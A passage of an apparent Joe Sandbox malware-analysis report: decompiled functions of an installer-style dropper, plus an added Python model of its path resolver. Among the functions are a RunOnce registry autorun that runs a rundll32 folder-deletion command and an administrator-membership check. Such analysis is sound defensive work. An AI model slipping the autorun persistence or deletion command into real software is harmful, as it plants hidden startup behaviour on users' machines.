                                                                                                                                                                                                    0x0017430e
                                                                                                                                                                                                    0x00174315
                                                                                                                                                                                                    0x0017431c
                                                                                                                                                                                                    0x00174322
                                                                                                                                                                                                    0x00174326
                                                                                                                                                                                                    0x0017432d
                                                                                                                                                                                                    0x0017432d
                                                                                                                                                                                                    0x0017432f
                                                                                                                                                                                                    0x00174334
                                                                                                                                                                                                    0x00174343
                                                                                                                                                                                                    0x00174349
                                                                                                                                                                                                    0x0017434d
                                                                                                                                                                                                    0x00174354
                                                                                                                                                                                                    0x00174354
                                                                                                                                                                                                    0x0017435d
                                                                                                                                                                                                    0x0017436e
                                                                                                                                                                                                    0x0017436e
                                                                                                                                                                                                    0x0017437d
                                                                                                                                                                                                    0x00174383
                                                                                                                                                                                                    0x00174387
                                                                                                                                                                                                    0x0017438e
                                                                                                                                                                                                    0x0017438e
                                                                                                                                                                                                    0x00174387
                                                                                                                                                                                                    0x00174391
                                                                                                                                                                                                    0x00174399
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00174295
                                                                                                                                                                                                    0x0017429f
                                                                                                                                                                                                    0x001742a5
                                                                                                                                                                                                    0x001742aa
                                                                                                                                                                                                    0x001742aa
                                                                                                                                                                                                    0x001742ad
                                                                                                                                                                                                    0x001742ad
                                                                                                                                                                                                    0x001742af
                                                                                                                                                                                                    0x001742b0
                                                                                                                                                                                                    0x001742b6
                                                                                                                                                                                                    0x001742c2
                                                                                                                                                                                                    0x001742c8
                                                                                                                                                                                                    0x001742ce
                                                                                                                                                                                                    0x001742e4
                                                                                                                                                                                                    0x001742e4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001742ce

APIs
• LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00174236
• GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 0017424C
• GetProcAddress.KERNEL32(00000000,000000C3), ref: 00174263
• GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 0017427A
• GetTempPathA.KERNEL32(00000104,001788C0,?,00000001), ref: 0017429F
• CharPrevA.USER32(001788C0,002F1181,?,00000001), ref: 001742C2
• CharPrevA.USER32(001788C0,00000000,?,00000001), ref: 001742D6
• FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00174391
• FreeLibrary.KERNEL32(00000000,?,00000001), ref: 001743A5
Strings
Memory Dump Source
• Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_170000_file.jbxd
Similarity
• API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
• String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
• API String ID: 1865808269-1731843650
• Opcode ID: ce78c2ecb7e73eaff100dda1812413ea3b304532cf47c0e0aca05f217f2476b2
• Instruction ID: 5dc9dc32e4ecc000b6ee703b6e821688a9105f37555b68febb79b9caca2733a4
• Opcode Fuzzy Hash: ce78c2ecb7e73eaff100dda1812413ea3b304532cf47c0e0aca05f217f2476b2
• Instruction Fuzzy Hash: BF412674A80210AFE711AF74DC8CA6E7BB4FF49344F8485A9F90DA3251CB748D81C762
Uniqueness

Uniqueness Score: -1.00%
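
The decompiled function E00172773 that follows is a path-token resolver of the kind used by installer stubs: a string without a '#' prefix, or with '#S', is rooted in the system directory; '#W' is rooted in the Windows directory; any other selector letter is looked up as a subkey of HKLM\Software\Microsoft\Windows\CurrentVersion\App Paths, and a REG_EXPAND_SZ value is passed through ExpandEnvironmentStringsA. The Python model below is an added example written for this page, not code from the Joe Sandbox report or from the sample. It replaces the Win32 calls with an injectable environment so it runs offline, and it makes three labelled assumptions: that E00171781 is a bounded copy and E0017658A a path-join append (consistent with how the listing uses them), that the continuation cut off after the listing (labels L10 and L15) appends the remainder to the buffer the way L16 does, and that the value name stored at 0x171140 (not dumped on this page) selects the key's single modelled value. The registry entries and directories are constructed test data.

```python
"""Model of the path-token dispatch in E00172773 (added example, not from the report).

ASSUMPTIONS (labelled in the comments): E00171781 == bounded copy, E0017658A ==
path-join append, cut-off labels L10/L15 behave like L16, and the value name at
0x171140 is the key's only modelled value.  All Win32 state is injected.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple

MAX_PATH = 0x104                 # the 0x104 buffer size used throughout the listing
REG_SZ = 1                       # the type compared against 1 at label L9
REG_EXPAND_SZ = 2                # the type compared against 2 before ExpandEnvironmentStringsA
HKLM_APP_PATHS = r"Software\Microsoft\Windows\CurrentVersion\App Paths"


@dataclass
class Win32Env:
    """Stand-ins for the Win32 state the function reads (constructed, not captured)."""
    system_dir: str                                   # GetSystemDirectoryA result
    windows_dir: str                                  # GetWindowsDirectoryA result
    # HKLM subkey -> (value type, data) as RegQueryValueExA would return it
    registry: Dict[str, Tuple[int, str]] = field(default_factory=dict)
    env: Dict[str, str] = field(default_factory=dict)

    def expand_environment_strings(self, s: str) -> Optional[str]:
        """ExpandEnvironmentStringsA stand-in: unknown %VAR% stays literal;
        None models the zero return the listing checks for (result too long)."""
        out = re.sub(r"%([^%]+)%", lambda m: self.env.get(m.group(1), m.group(0)), s)
        return out if len(out) < MAX_PATH else None


def path_join(base: str, tail: str) -> str:
    """ASSUMED behaviour of E0017658A: append with a single backslash separator."""
    if not base:
        return tail
    return base + tail if base.endswith("\\") else base + "\\" + tail


def resolve_path_token(token: str, env: Win32Env) -> str:
    """Return what E00172773 leaves in its output buffer for `token`."""
    if not token.startswith("#"):                     # 0x23 == '#'
        # L14: no prefix -> system directory.  ASSUMPTION for the cut-off L15:
        # the whole token is appended, as L16 does with the remainder.
        return path_join(env.system_dir, token)

    letter = token[1:2].upper()                       # CharUpperA on the char after '#'
    remainder = token[3:]                             # CharNextA twice: skip letter + separator

    if letter == "S":                                 # 0x53
        return path_join(env.system_dir, remainder)
    if letter == "W":                                 # 0x57
        return path_join(env.windows_dir, remainder)

    # Any other letter: RegOpenKeyExA(HKEY_LOCAL_MACHINE == 0x80000002, KEY_READ == 0x20019)
    # on App Paths\<remainder>.  A missing key falls to L16, which appends the
    # remainder to the still-empty buffer, so the token comes back unchanged.
    subkey = path_join(HKLM_APP_PATHS, remainder)     # E00171781 copy + E0017658A append
    entry = env.registry.get(subkey)
    if entry is None:
        return path_join("", remainder)

    value_type, data = entry                          # RegQueryValueExA filled the buffer
    if value_type == REG_EXPAND_SZ:
        expanded = env.expand_environment_strings(data)
        if expanded is not None:                      # non-zero return: expanded copy wins
            return expanded
        # zero return re-enters L9 with the original type (not REG_SZ);
        # ASSUMPTION: the raw data stays in the buffer
    return data                                       # REG_SZ reaches L10; ASSUMED used as is


def sample_env() -> Win32Env:
    """Constructed environment for the demo; not captured from the analysed run."""
    return Win32Env(
        system_dir=r"C:\Windows\System32",
        windows_dir=r"C:\Windows",
        registry={
            path_join(HKLM_APP_PATHS, "notepad.exe"): (REG_EXPAND_SZ, r"%SystemRoot%\notepad.exe"),
            path_join(HKLM_APP_PATHS, "chrome.exe"): (REG_SZ, r"C:\Program Files\Google\Chrome\Application\chrome.exe"),
        },
        env={"SystemRoot": r"C:\Windows"},
    )


if __name__ == "__main__":
    demo = sample_env()
    for tok in (r"#S\cmd.exe", r"#w\explorer.exe", r"#A\notepad.exe",
                r"#A\chrome.exe", r"#A\nothere.exe", "user32.dll"):
        print(f"{tok!r:22} -> {resolve_path_token(tok, demo)}")
```

Feeding tokens of this shape recovered from the dropper's strings into resolve_path_token gives the on-disk locations to hunt for on a victim host; note that the App Paths branch makes the resolved location depend on HKLM state, so the same token can resolve differently on differently provisioned machines.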

C-Code - Quality: 94%
			E00172773(CHAR* __ecx, char* _a4) {
				signed int _v8;
				char _v268;
				char _v269;
				CHAR* _v276;
				int _v280;
				void* _v284;
				int _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				intOrPtr _t34;
				int _t45;
				int* _t50;
				CHAR* _t52;
				CHAR* _t61;
				char* _t62;
				int _t63;
				CHAR* _t64;
				signed int _t65;

				_t52 = __ecx;
				_t23 =  *0x178004; // 0x4ffa21aa (/GS security cookie)
				_v8 = _t23 ^ _t65; // cookie XOR ebp, checked on return
				_t62 = _a4;
				_t50 = 0;
				_t61 = __ecx; // ecx = output buffer
				_v276 = _t62;
				 *((char*)(__ecx)) = 0; // output starts empty
				if( *_t62 != 0x23) { // 0x23 == '#'
					_t63 = 0x104; // MAX_PATH
					goto L14;
				} else {
					_t64 = _t62 + 1;
					_v269 = CharUpperA( *_t64); // selector letter after '#'
					_v276 = CharNextA(CharNextA(_t64)); // remainder: skip letter and separator
					_t63 = 0x104;
					_t34 = _v269;
					if(_t34 == 0x53) { // 'S'
						L14:
						GetSystemDirectoryA(_t61, _t63);
						goto L15;
					} else {
						if(_t34 == 0x57) { // 'W'
							GetWindowsDirectoryA(_t61, 0x104);
							goto L16;
						} else {
							_push(_t52);
							_v288 = 0x104;
							E00171781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
							_t59 = 0x104;
							E0017658A( &_v268, 0x104, _v276); // append remainder to the key name
							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) { // HKEY_LOCAL_MACHINE, KEY_READ
								L16:
								_t59 = _t63;
								E0017658A(_t61, _t63, _v276); // append remainder to the output buffer
							} else {
								if(RegQueryValueExA(_v284, 0x171140, 0,  &_v280, _t61,  &_v288) == 0) { // value name at 0x171140; data lands in the output buffer
									_t45 = _v280;
									if(_t45 != 2) { // 2 == REG_EXPAND_SZ
										L9:
										if(_t45 == 1) { // 1 == REG_SZ
											goto L10;
										}
									} else {
										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) { // 0 == failure
											_t45 = _v280;
											goto L9;
										} else {
											_t59 = 0x104;
                                                                                                                                                                                                    											E00171680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                    											L10:
                                                                                                                                                                                                    											_t50 = 1;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								RegCloseKey(_v284);
                                                                                                                                                                                                    								L15:
                                                                                                                                                                                                    								if(_t50 == 0) {
                                                                                                                                                                                                    									goto L16;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00176CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                    			}
























APIs
• CharUpperA.USER32(4FFA21AA,00000000,00000000,00000000), ref: 001727A8
• CharNextA.USER32(0000054D), ref: 001727B5
• CharNextA.USER32(00000000), ref: 001727BC
• RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00172829
• RegQueryValueExA.ADVAPI32(?,00171140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00172852
• ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00172870
• RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001728A0
• GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 001728AA
• GetSystemDirectoryA.KERNEL32 ref: 001728B9
Strings
• Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 001727E4
Memory Dump Source
• Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_170000_file.jbxd
Similarity
• API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
• String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
• API String ID: 2659952014-2428544900
• Opcode ID: 991d86819cd6b28f4f80c8559676a3ba3a9f3ed6b542945a41beb5f63443de5a
• Instruction ID: 9db1e36d2cae256b734075aeefe5b12689ef2fb5e7d615dca4c24d512b15713c
• Opcode Fuzzy Hash: 991d86819cd6b28f4f80c8559676a3ba3a9f3ed6b542945a41beb5f63443de5a
• Instruction Fuzzy Hash: 2441B571A0012CAFDB249B64DC85AEE77BDEF59700F4084A9F54DD2100DB708EC69FA2
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 62%
			E00172267() {
				signed int _v8;
				char _v268;
				char _v836;
				void* _v840;
				int _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				intOrPtr _t33;
				void* _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t47;
				void* _t49;
				signed int _t51;

				_t19 =  *0x178004; // 0x4ffa21aa
				_t20 = _t19 ^ _t51;
				_v8 = _t19 ^ _t51;
				if( *0x178530 != 0) {
					_push(_t49);
					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
						_push(_t38);
						_v844 = 0x238;
						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
							_push(_t47);
							memset( &_v268, 0, 0x104);
							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                    								E0017658A( &_v268, 0x104, 0x171140);
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_push("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                    							E0017171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                    							_t42 =  &_v836;
                                                                                                                                                                                                    							_t45 = _t42 + 1;
                                                                                                                                                                                                    							_pop(_t47);
                                                                                                                                                                                                    							do {
                                                                                                                                                                                                    								_t33 =  *_t42;
                                                                                                                                                                                                    								_t42 = _t42 + 1;
                                                                                                                                                                                                    							} while (_t33 != 0);
                                                                                                                                                                                                    							RegSetValueExA(_v840, "wextract_cleanup0", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                    						_pop(_t38);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_pop(_t49);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00176CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                    			}

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 001722A3
                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,?,00000001), ref: 001722D8
                                                                                                                                                                                                    • memset.MSVCRT ref: 001722F5
                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 00172305
                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 0017236E
                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0017237A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00172299
                                                                                                                                                                                                    • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 0017232D
                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00172321
                                                                                                                                                                                                    • wextract_cleanup0, xrefs: 0017227C, 001722CD, 00172363
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                                                                                                                                                                    • API String ID: 3027380567-2554356261
                                                                                                                                                                                                    • Opcode ID: 294b532454cd3f729d2653e4b5eca4ed4e13776dd2f85adb8de48ea7400ed864
                                                                                                                                                                                                    • Instruction ID: d7820af902bd61c30f5e40fb189145cd29a16cdc8a66b85baa0d5bec8d8d9828
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 294b532454cd3f729d2653e4b5eca4ed4e13776dd2f85adb8de48ea7400ed864
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B531C371A40218ABDB219B64DC49FEB7B7CEF58700F4041A9F90DA6051EB70ABC9CB50
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                                                    			E00173100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                    				void* _t8;
                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                    				void* _t15;
                                                                                                                                                                                                    				struct HWND__* _t16;
                                                                                                                                                                                                    				struct HWND__* _t33;
                                                                                                                                                                                                    				struct HWND__* _t34;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t8 = _a8 - 0xf;
                                                                                                                                                                                                    				if(_t8 == 0) {
                                                                                                                                                                                                    					if( *0x178590 == 0) {
                                                                                                                                                                                                    						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                    						 *0x178590 = 1;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L13:
                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t11 = _t8 - 1;
                                                                                                                                                                                                    				if(_t11 == 0) {
                                                                                                                                                                                                    					L7:
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					L8:
                                                                                                                                                                                                    					EndDialog(_a4, ??);
                                                                                                                                                                                                    					L9:
                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t15 = _t11 - 0x100;
                                                                                                                                                                                                    				if(_t15 == 0) {
                                                                                                                                                                                                    					_t16 = GetDesktopWindow();
                                                                                                                                                                                                    					_t33 = _a4;
                                                                                                                                                                                                    					E001743D0(_t33, _t16);
                                                                                                                                                                                                    					SetDlgItemTextA(_t33, 0x834,  *0x178d4c);
                                                                                                                                                                                                    					SetWindowTextA(_t33, "nst0dum");
                                                                                                                                                                                                    					SetForegroundWindow(_t33);
                                                                                                                                                                                                    					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                    					 *0x1788b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                    					SetWindowLongA(_t34, 0xfffffffc, E001730C0);
                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_t15 != 1) {
		goto L13;
	}
	if(_a12 != 6) {
		if(_a12 != 7) {
			goto L9;
		}
		goto L7;
	}
	_push(1);
	goto L8;
}

APIs
• EndDialog.USER32(?,00000000), ref: 0017313B
• GetDesktopWindow.USER32 ref: 0017314B
• SetDlgItemTextA.USER32(?,00000834), ref: 0017316A
• SetWindowTextA.USER32(?,nst0dum), ref: 00173176
• SetForegroundWindow.USER32(?), ref: 0017317D
• GetDlgItem.USER32(?,00000834), ref: 00173185
• GetWindowLongA.USER32(00000000,000000FC), ref: 00173190
• SetWindowLongA.USER32(00000000,000000FC,001730C0), ref: 001731A3
• SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 001731CA
Strings
Memory Dump Source
• Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_170000_file.jbxd
Similarity
• API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
• String ID: nst0dum
• API String ID: 3785188418-432003757
• Opcode ID: 4bd7c835fbf60b103f86ebd9bc84c1a62d64506204f761230c31ab3e6994c085
• Instruction ID: b66aab3c05cae61b94e0241b866b43f1b0a13bff6ba545cf199a9ba8fdcc5b34
• Opcode Fuzzy Hash: 4bd7c835fbf60b103f86ebd9bc84c1a62d64506204f761230c31ab3e6994c085
• Instruction Fuzzy Hash: 8711B131244211BBEB116F24DC0CB9E3B74FF8A721F908620F82D919E0DB7096C1E782
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 82%
E0017468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
	long _t4;
	void* _t11;
	CHAR* _t14;
	void* _t15;
	long _t16;

	_t14 = __ecx;
	_t11 = __edx;
	_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
	_t16 = _t4;
	if(_t16 <= _a4 && _t11 != 0) {
		if(_t16 == 0) {
			L5:
			return 0;
		}
		_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
		if(_t15 == 0) {
			goto L5;
		}
		__imp__memcpy_s(_t11, _a4, _t15, _t16);
		FreeResource(_t15);
		return _t16;
	}
	return _t4;
}

APIs
• FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001746A0
• SizeofResource.KERNEL32(00000000,00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746A9
• FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001746C3
• LoadResource.KERNEL32(00000000,00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746CC
• LockResource.KERNEL32(00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746D3
• memcpy_s.MSVCRT ref: 001746E5
• FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001746EF
Strings
Memory Dump Source
• Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_170000_file.jbxd
Similarity
• API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
• String ID: TITLE$nst0dum
• API String ID: 3370778649-1250357435
• Opcode ID: 8582df6272357862dac4abdfd5078af6fe34cc07c0285386b27341c3b73d141f
• Instruction ID: 53845515cf5306dd49a6ac12de41c0772d9859539091446c3b6052c912d54fc7
• Opcode Fuzzy Hash: 8582df6272357862dac4abdfd5078af6fe34cc07c0285386b27341c3b73d141f
• Instruction Fuzzy Hash: FC0186362442107BE31027A55C4DF6F7E3CEFCAB52F844414FB4D96591DB6188C186A6
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 57%
/* Decompiler output (Joe Sandbox / IDA). This is the classic "is the caller a member of
   BUILTIN\Administrators" check: CheckTokenMembership is resolved at run time from
   advapi32.dll, the SID S-1-5-32-544 is built (authority {0,0,0,0,0,5} comes from the
   adjacent _v16/_v12 stack slots, sub-authorities 0x20 = SECURITY_BUILTIN_DOMAIN_RID and
   0x220 = DOMAIN_ALIAS_RID_ADMINS), and the BOOL result is written through __ecx.
   Return value: 1 if the API could be resolved, 0 otherwise. */
E001717EE(intOrPtr* __ecx) {
	signed int _v8;
	short _v12;
	struct _SID_IDENTIFIER_AUTHORITY _v16;
	_Unknown_base(*)()* _v20;
	void* _v24;
	intOrPtr* _v28;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t14;
	_Unknown_base(*)()* _t20;
	long _t28;
	void* _t35;
	struct HINSTANCE__* _t36;
	signed int _t38;
	intOrPtr* _t39;

	_t14 =  *0x178004; // 0x4ffa21aa (stack-cookie seed)
	_v8 = _t14 ^ _t38;
	_v12 = 0x500;               // together with _v16 forms SECURITY_NT_AUTHORITY
	_t37 = __ecx;
	_v16.Value = 0;
	_v28 = __ecx;               // output PBOOL
	_t28 = 0;
	_t36 = LoadLibraryA("advapi32.dll");
	if(_t36 != 0) {
		_t20 = GetProcAddress(_t36, "CheckTokenMembership");
		_v20 = _t20;
		if(_t20 != 0) {
			 *_t37 = 0;         // default: not a member
			_t28 = 1;
			if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
				_t37 = _t39;
				// CheckTokenMembership(NULL, pAdminSid, pIsMember) through the resolved pointer
				 *0x17a288(0, _v24, _v28);
				_v20();
				if(_t39 != _t39) {  // compiler ESP/stack-check artefact
					asm("int 0x29");
				}
				FreeSid(_v24);
			}
		}
		FreeLibrary(_t36);
	}
	return E00176CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37); // stack-cookie check epilogue
}

APIs
• LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,001718DD), ref: 0017181A
• GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0017182C
• AllocateAndInitializeSid.ADVAPI32(001718DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,001718DD), ref: 00171855
• FreeSid.ADVAPI32(?,?,?,?,001718DD), ref: 00171883
• FreeLibrary.KERNEL32(00000000,?,?,?,001718DD), ref: 0017188A
Strings
Memory Dump Source
• Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_170000_file.jbxd
Similarity
• API ID: FreeLibrary$AddressAllocateInitializeLoadProc
• String ID: CheckTokenMembership$advapi32.dll
• API String ID: 4204503880-1888249752
• Opcode ID: db1eda375bbcdb4fb33151307180b1947e4bbb53fac8f96da7bd4afeaaadcf4f
• Instruction ID: 21bb726f386fcddbdc5e576737cb3db3bb2f1586dd7e45971c8d95da07db3de3
• Opcode Fuzzy Hash: db1eda375bbcdb4fb33151307180b1947e4bbb53fac8f96da7bd4afeaaadcf4f
• Instruction Fuzzy Hash: 4811B931E40209BFDB109FA4DC49ABEBB78EF84701F504569F919E3290DB309D408B92
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
/* Decompiler output (Joe Sandbox / IDA). A dialog procedure: _a4 = HWND, _a8 = message,
   _a12 = wParam. Handles WM_CLOSE (0x10), WM_INITDIALOG (0x110) and WM_COMMAND (0x111);
   returns 1 when the message was handled, 0 otherwise. */
E00173450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
	void* _t7;
	void* _t11;
	struct HWND__* _t12;
	int _t22;
	struct HWND__* _t24;

	_t7 = _a8 - 0x10;
	if(_t7 == 0) {               // WM_CLOSE
		EndDialog(_a4, 2);       // 2 = IDCANCEL
		L11:
		return 1;
	}
	_t11 = _t7 - 0x100;
	if(_t11 == 0) {              // WM_INITDIALOG
		_t12 = GetDesktopWindow();
		_t24 = _a4;
		E001743D0(_t24, _t12);   // positions the dialog relative to the desktop window
		SetWindowTextA(_t24, "nst0dum");
		SetDlgItemTextA(_t24, 0x838,  *0x179404);
		SetForegroundWindow(_t24);
		goto L11;
	}
	if(_t11 == 1) {              // WM_COMMAND, _a12 = control/command ID
